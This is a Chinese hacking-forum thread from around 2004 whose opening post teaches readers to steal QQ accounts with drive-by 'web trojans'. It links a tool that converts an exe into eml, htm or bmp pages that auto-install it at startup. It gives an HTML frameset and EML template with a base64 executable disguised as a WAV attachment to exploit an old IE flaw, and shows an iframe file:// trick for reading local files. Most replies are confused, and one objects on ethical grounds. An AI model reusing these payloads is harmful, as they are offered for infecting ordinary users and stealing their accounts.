论坛: 菜鸟乐园 标题: 手把手教你盗QQ 复制本贴地址    
作者: leiaimp [leiaimp]    论坛用户   登录
大家都有被盗QQ的经历吧
我就说说如何盗……

4000是什么端口?这个大家恐怕最熟了,就是QQ的默认使用端口.但如果你本机4000端口被占用了的话,QQ也会在4000以后挨次开一个端口使用.我以前有网站做论坛时,为吸引人气,送过500多个QQ.其中有我申请的,也有我盗的,这一节我就来说一些怎样盗QQ.去网吧下木马?不是一个好方法,只能盗当地人的QQ,还要小心被人揍呀.哈哈.我要说的是制做网页木马远程盗QQ.
第一种方法,用工具.制做网页木马,都是利用的ie5的漏洞,从而在客户机的电脑中生成exe程序.这里我推荐你用一个傻瓜做网页木马的工具,下载地址:delphi2000.3322.net/source/hack3.zip.我们来看看说明,就知这个工具有多好了.使用说明:
本系统工具包含下列三个工具,和源程序

1.eml文件生成器和c源码
eml.exe是一个将exe文件转换成eml文件的程序,使用时,将要转换的exe文件放在当前目录下,取名为s.exe然运行eml.exe,就会在当前目录下生成s.eml文件,其中eml.c是源程序

2.exe文件转化成htm文件的程序和c源码
e2h4.exe是一个将exe文件转换成html文件的程序,使用时,将要转换的exe文件放在当前目录下,取名为s.exe然后运行e2h4.exe,就会在当前目录下生成1.htm和1.js文件,然后将这两个文件放在你的主页空间中,当有人看你的1.htm网页是,会在他的电脑中自动解码出tmp.exe文件,并将该文件放入对方电脑的启动组中,其中e2h4.c是源程序

3.exe文件转化成bmp文件的程序和c源码
e2b.exe是一个将exe文件转换成bmp文件的程序,使用时,将要转换的exe文件放在当前目录下,取名为s.exe然后运行e2b.exe,就会在当前目录下生成1.htm和1.js以及s.bmp文件,然后将这三个文件放在你的主页空间中,当有人看你的1.htm网页是,会在他的电脑中自动解码出tmp.exe文件,并将该文件放入对方电脑的系统目录中,并在对方电脑中注册表中增加自启动项,其中e2b.c是源程序

第二种方法,手工
如果我们手工制做网页木马呢?这里我就要说到以前我写的一篇文章,frame漏洞的应用,发在黑白,很多人看到了.我现在给重新重理了一下.
iframe是<html>语句里的一个元素,Iframe标记的使用格式是:   <Iframe src="URL" width="x" height="x" scrolling="[OPTION]" frameborder="x"></iframe>   src:文件的路径,既可是HTML文件,也可以是文本、ASP等;   width、height:"画中画"区域的宽与高;   scrolling:当SRC的指定的HTML文件在指定的区域不显不完时,滚动选项,如果设置为NO,则不出现滚动条;如为Auto:则自动出现滚动条;如为Yes,则显示滚动条;   FrameBorder:区域边框的宽度,为了让“画中画“与邻近的内容相融合,常设置为0。 这样在网页里会显示一个框架,框架的内容就是这个src。问题是我们如果在src=""将引号的内容换成别的文件,那么我们能利用它具体能做什么?

1、做网页用呀。干什么?谁扔砖头。将URL换成www.163.com不就是将网易网站变成你网页里一个小窗口了?有画中画效果呢。]

2、说到重点了,可以读本地文件。假如你女朋友有封情书放成这样c:\情书.txt。电脑又封锁c:,看不到着急呀。写这样一个脚本<IFRAME SRC="file://c:/情书.txt"></IFRAME>然后保存成htm文件运行后不就看到情书了,呀气死了,是写给lcx的。再想一下如果要运行c:/autoexec.bat应当怎样写?

3、如果要让这个html文件运行exe文件呢?重点中的重点呀。直接运行src=*.exe是下载呀,不是运行。我弄一个木马,别人不买帐,先要下载才执行,能不能让它直接执行呢?聪明人就想出办法了。将src=*.exe换成src=*.eml就可以了。*.eml是什么东西?是outlook邮件格式的附件呀。微软又有漏洞了。如果eml附件是音乐格式的话就可以直接播放了。换句话说,我们用outlook写一封信,附件里带上那个木马.exe文件,然后另存为*.eml文件,将这个附件的格式换成音乐格式....那不就可以了?
好,我在这儿写一个网页木马模板,你照着修改就可以了.先做一个网页,名为1.htm,源码:
<head>
<title>这是一个演示,请不要害怕!!!</title>
</head>
<frameset>
<frame SRC=s.eml>
</frame>
</frameset>
8:20 2002-11-3</p>
</body>
</html>
网页中的有行代码是src=s.eml,这个eml文件的模板如下:
Content-Type: multipart/related;boundary="1" --1
Content-Type: multipart/alternative;boundary="2" --2
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable

--1
Content-Type: audio/x-wav;name="hack.exe"
Content-Transfer-Encoding: base64
Content-ID:
TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAEAALoQAA4ftAnNIbgBTM0hkJBUaGlzIHByb2dyYW0gbXVzdCBiZSBydW4gdW5kZXIgV2lu MzINCiQ3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFBFAABMAQQAVCsljwAAAAAAAAAA4ACOgQsBAhkA AgAAAAgAAAAAAAAAEAAAABAAAAAgAAAAAEAAABAAAAACAAABAAAAAAAAAAMACgAAAAAAAFAAAAAE AAAAAAAAAgAAAAAAEAAAIAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAADAAAJAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAQAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ09ERQAAAAAA EAAAABAAAAACAAAABgAAAAAAAAAAAAAAAAAAIAAAYERBVEEAAAAAABAAAAAgAAAABAAAAAgAAAAA AAAAAAAAAAAAAEAAAMAuaWRhdGEAAAAQAAAAMAAAAAIAAAAMAAAAAAAAAAAAAAAAAABAAADALnJl bG9jAAAAEAAAAEAAAAACAAAADgAAAAAAAAAAAAAAAAAAQAAAUAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAagBo ACBAAGgbIEAAagDoBwAAAGoA6AYAAAD/JUwwQAD/JVQwQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABXaW5k b3dzIDl4L05UILvjseDKvre2s8zQ8gDV4srH0ru49tfuvPK1pbXEV2luZG93cyA5eC9OVCAzMs67 u+Ox4NPv0dSzzNDytcTUy9DQveG5+w0KseCzzKO6xN+9qLuqICC+tMfrueLB2aO6aHR0cDovL2hv dHNreS4zNjMubmV0DQogICAgICAgICAgICAgICAgICCh76Hvoe+h76HvDQotLS0tLS0tLS0tLS2x 4NLrwbS907e9yr2julRBU00gNS4wLS0tLS0tLS0tLS0tLS0tDQp0YXNtMzIgIC9tbCAgL20yIHRp bnkN***RsaW5rMzIgL1RwZSAvYWEgdGlueSAsICwgLCAuLlxsaWJcaW1wb3J0MzIubGliDQotLS0t LS0tLS0tLS0tLS0tLdLUz8LKx7PM0PLV/c7ELS0tLS0tLS0tLS0tLS0tLS0tDQogICAgICAgIC41 ODZwDQogICAgICAgIC5tb2RlbCBmbGF0LFNURENBTEwNCmV4dHJuICAgIE1lc3NhZ2VCb3hBOlBS T0MNCmV4dHJuICAgIEV4aXRQcm9jZXNzOlBST0MNCiAgICAgICAgLmRhdGEN***RpdGxlICAgIGRi ICK0sL/aserM4iIsMA0KbWVzc2FnZSAgZGIgIrSwv9rQxc+iIiwwDQogICAgICAgIC5jb2RlDQpi ZWdpbjoNCiAgICAgICAgY2FsbCBNZXNzYWdlQm94QSwwLE9GRlNFVCBtZXNzYWdlLE9GRlNFVCB0 aXRsZSwwDQogICAgICAgIGNhbGwgRXhpdFByb2Nlc3MsMA0KICAgICAgICBlbmRzDQogICAgICAg IGVuZCBiZWdpbgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPDAAAAAA AAAAAAAAXDAAAEwwAABEMAAAAAAAAAAAAABnMAAAVDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAdDAA AAAAAACCMAAAAAAAAHQwAAAAAAAAgjAAAAAAAABVU0VSMzIuZGxsAEtFUk5FTDMyLmRsbAAAAE1l c3NhZ2VCb3hBAAAARXhpdFByb2Nlc3MAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAFAAA AAMwCDAcMCIwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


你要做的就是修改s.eml模板中的绿色代码.把hack.exe修改为你要盗qq的木马的名字,把下面的编码换成你要盗qq木马的base64编码.如何得到exe文件的base64编码?用outlookexpress就可以.方法这样:outlokkpress-邮件-新邮件-插入-文件附件-找到你的木马文件--文件--另存为--s.eml,然后用记事本打开这个s.eml,找到那些整齐的乱码就可以了,用它来替换我这个eml文件里的乱码就可以了.


现在网上发的工具都不实用了
还是用这个方法比较好
虽然比较麻烦


地主 发表时间: 04-01-05 21:23

回复: abctm [abctm]   版主   登录


B1层 发表时间: 04-01-05 21:26

回复: boby [boby]   论坛用户   登录
眼镜的度数又该加了!


B2层 发表时间: 04-01-06 10:48

回复: blegding [blegding]   论坛用户   登录
这个办法很不错。。不有些软件强多了~~。。。~。

B3层 发表时间: 04-01-06 11:21

回复: yzxh24 [yzxh24]   论坛用户   登录
写的好  就是看不懂!!

B4层 发表时间: 04-01-06 11:56

回复: goodwang [goodwang]      登录
是啊,有点看不懂

B5层 发表时间: 04-01-06 13:16

回复: 2132 [dick83815]   论坛用户   登录
我有点眼花 啊!睡觉去

B6层 发表时间: 04-01-06 13:58

回复: wyj82 [wyj82]   论坛用户   登录
我看不懂啊 ?  加我155368281  给我解释一下  好吗?

B7层 发表时间: 04-01-06 15:52

回复: zybzc [zybzc]   论坛用户   登录
在哪里翻来的话语噻
我怕你自己都没弄清楚是什么家伙
  这个是网页木马的原理

      一下说不清 哪天整理还了就发出来吧  20CN的人太善良 提防心不强

B8层 发表时间: 04-01-06 16:10

回复: shan_08 [shan_08]   论坛用户   登录
看不懂!!!

B9层 发表时间: 04-01-06 16:18

回复: sungod [sungod]   论坛用户   登录
没有事干

B10层 发表时间: 04-01-06 17:20

回复: sd577035 [sd577035]   论坛用户   登录
  希望下次能说的明白点~~~
是手把手教吗???
那就说的更加详细点呀~~~不要让很多人怀疑你~~~~

B11层 发表时间: 04-01-06 17:27

回复: shan_08 [shan_08]   论坛用户   登录
同意上面朋友说的!!

B12层 发表时间: 04-01-06 17:33

回复: bobyy [bobyy]   论坛用户   登录
楼主好意

可我就是不知道你在说什么!



B13层 发表时间: 05-09-12 20:09

回复: hctwmx [hctwmx]   论坛用户   登录
看不懂  0
我也没有看

B14层 发表时间: 05-09-12 21:06

回复: xmm7308426 [xmm7308426]   论坛用户   登录
很厉害,但看的懂啊.

B15层 发表时间: 05-09-13 12:54

回复: virgoshaka [virgoshaka]   论坛用户   登录
所谓盗QQ的方法,其实就这么三种:
1.暴力破解,通过QQ游戏之类的附属产品,没什么好说的
2.先用木马进入,然后键盘记录(就是搂主讲了一大堆的东西?)
3.入侵腾迅服务器直接拿到密码。。(谁可以教教我啊
别的没方法了。。。


B16层 发表时间: 05-09-13 13:05

回复: zshshof [zshshof]   论坛用户   登录
是呀这个就是把代码复制的网站上面去,把他说的那个代码改一下是,哎不行,大概是这样吧,说错了大家不要笑我哦,我也是初学者,有没有好一点的软件可以破解的那种哦,我的号也被别人给盗了,很是不服气,这不也来学盗QQ哦,大家可以交流一下吗?教教我们这些初学者哦!
在说我们也没有什么经验,只能从简单的学起哦!同意我的观点的朋友可以给我留言哦!
也可以发邮件E-mail:328082931@163.com


B17层 发表时间: 05-09-20 17:19

回复: zhengzheng [zhengzheng]   论坛用户   登录
头晕!!

B18层 发表时间: 05-09-21 12:28

回复: a103945764 [a103945764]   论坛用户   登录
我也是啊

B19层 发表时间: 05-09-22 20:49

回复: sun3522 [sun3522]   论坛用户   登录
  不要老想盗QQ嘛!!不觉的有点缺德吗??我也有被人盗QQ的经历,真的不太好受!所以大家学学盗QQ技术还好,不要真的乱盗别人QQ。当然你如果和那人有仇的话,那盗他QQ应该不算缺德喽!!

B20层 发表时间: 05-09-23 09:32

回复: fancyher [fancyher]   论坛用户   登录
引用:
不要老想盗QQ嘛!!


B21层 发表时间: 05-09-23 18:38

回复: yamadasa [stevenson]   论坛用户   登录
太深了,不好学,能不能简单点!直接告诉我的密码不就得了!!

B22层 发表时间: 05-09-25 19:17

回复: litao8139 [litao8139]   论坛用户   登录
小样,你新来的吧,现在盗QQ还要用你那样老土的办法吗,晕,要花多少上网费啊,倒。。。。。。

B23层 发表时间: 05-09-26 09:55

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号